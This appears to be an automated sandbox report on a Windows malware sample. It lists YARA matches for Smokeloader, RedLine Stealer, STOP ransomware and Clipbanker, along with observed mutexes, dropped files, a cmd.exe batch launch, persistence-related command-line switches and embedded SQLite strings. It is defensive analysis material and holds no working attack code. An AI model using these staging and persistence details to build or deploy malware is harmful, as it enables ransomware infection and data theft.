Source: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.1803546688.0000000000AD1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.1764276371.00000000048C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000002.1897883269.000000000482F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.1943356920.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: 1601.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 5136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 3944, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 3108, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 3952, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 5068, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 1601.exe PID: 6044, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@51/210@14/11

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

9_2_00411900

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Code function: 0_2_02F5B7F7 CreateToolhelp32Snapshot,Module32First,

0_2_02F5B7F7

Source: C:\Users\user\AppData\Local\Temp\1601.exe

Code function: 9_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

9_2_0040D240

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\fcbhtea

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3968
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C2.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C2.bat" "

Source: unknown

Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --ForNetRes	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --Task	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --AutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --Service	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: X1P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: runas	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: x2Q	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: x*P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: C:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: D:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: 7P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: %username%	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Command line argument: F:\	9_2_00419F90

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2302580877.000000006CFEF000.00000002.00000001.01000000.0000001A.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000013.00000002.2295057732.0000000020F32000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2293491175.000000001E9F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
